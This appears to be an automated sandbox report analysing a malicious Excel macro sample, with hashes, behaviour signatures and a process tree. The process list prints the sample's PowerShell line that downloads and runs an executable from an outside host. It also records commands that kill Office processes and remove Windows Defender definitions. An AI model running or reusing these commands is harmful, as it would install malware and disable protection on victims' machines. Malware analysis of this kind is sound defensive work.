Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
15/09/2024, 04:10
Behavioral task
behavioral1
Sample
e1add0c2917aaf34236db315da09d8f2_JaffaCakes118.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e1add0c2917aaf34236db315da09d8f2_JaffaCakes118.xlsm
Resource
win10v2004-20240802-en
General
-
Target
e1add0c2917aaf34236db315da09d8f2_JaffaCakes118.xlsm
-
Size
19KB
-
MD5
e1add0c2917aaf34236db315da09d8f2
-
SHA1
3460271d345cc4ba4ab112c5abe04e40e483145e
-
SHA256
ffc9eca5a1e84b5ebe2d3f7124efbd48d96d24686b429f09743359370f915760
-
SHA512
e041cf1b0c4aeb491488b027d08ea5c2febd640ce08166f5610e9baf783b2eacf39bd23591c3325255e67d548acca49ba72aeff9f0afcaa0505331f8ce252ecc
-
SSDEEP
384:+2QdQ5yunO0qEF6C4zfusWGCVXToqIJPXaxq5:+U5D6EFTcKdKMc
Malware Config
Extracted
http://panelonetwothree.ga/work/6.exe
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 3048 2572 powershell.exe 30 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2140 2572 cmd.exe 30 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 344 2572 powershell.exe 30 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2816 2572 cmd.exe 30 -
pid Process 3048 powershell.exe 3048 powershell.exe 344 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Kills process with taskkill 2 IoCs
pid Process 2968 taskkill.exe 2728 taskkill.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2572 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3048 powershell.exe 344 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2968 taskkill.exe Token: SeDebugPrivilege 3048 powershell.exe Token: SeDebugPrivilege 344 powershell.exe Token: SeDebugPrivilege 2728 taskkill.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2572 EXCEL.EXE 2572 EXCEL.EXE 2572 EXCEL.EXE -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2572 wrote to memory of 3048 2572 EXCEL.EXE 31 PID 2572 wrote to memory of 3048 2572 EXCEL.EXE 31 PID 2572 wrote to memory of 3048 2572 EXCEL.EXE 31 PID 2572 wrote to memory of 3048 2572 EXCEL.EXE 31 PID 2572 wrote to memory of 2140 2572 EXCEL.EXE 33 PID 2572 wrote to memory of 2140 2572 EXCEL.EXE 33 PID 2572 wrote to memory of 2140 2572 EXCEL.EXE 33 PID 2572 wrote to memory of 2140 2572 EXCEL.EXE 33 PID 2572 wrote to memory of 344 2572 EXCEL.EXE 35 PID 2572 wrote to memory of 344 2572 EXCEL.EXE 35 PID 2572 wrote to memory of 344 2572 EXCEL.EXE 35 PID 2572 wrote to memory of 344 2572 EXCEL.EXE 35 PID 2572 wrote to memory of 2816 2572 EXCEL.EXE 37 PID 2572 wrote to memory of 2816 2572 EXCEL.EXE 37 PID 2572 wrote to memory of 2816 2572 EXCEL.EXE 37 PID 2572 wrote to memory of 2816 2572 EXCEL.EXE 37 PID 2140 wrote to memory of 2968 2140 cmd.exe 39 PID 2140 wrote to memory of 2968 2140 cmd.exe 39 PID 2140 wrote to memory of 2968 2140 cmd.exe 39 PID 2140 wrote to memory of 2968 2140 cmd.exe 39 PID 344 wrote to memory of 2728 344 powershell.exe 41 PID 344 wrote to memory of 2728 344 powershell.exe 41 PID 344 wrote to memory of 2728 344 powershell.exe 41 PID 344 wrote to memory of 2728 344 powershell.exe 41
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\e1add0c2917aaf34236db315da09d8f2_JaffaCakes118.xlsm1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://panelonetwothree.ga/work/6.exe','C:\Users\Public\svchost32.exe');Start-Process 'C:\Users\Public\svchost32.exe'2⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & exit2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden taskkill /f /im Excel.exe2⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:344 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\system32\taskkill.exe" /f /im Excel.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd "C:\Program Files (x86)\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
PID:2816
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD57a7b68f48c4ac6063d7a81098672f812
SHA1ca4f9cc0420461cdca612b37f7ecb4473aef059e
SHA2569bab411e7c97ddbe4d699fc8b35e953c2c5fcfbf9d419e9653907e83a86052ee
SHA5125c085d0fdcc45aafb5f7fa1eade2bd76f5915fd8dd864ff8c6e317cdfc746daeeddcce8db28418810756c0b13211b4496ca75d86f21bdf4888fa0ffea309e536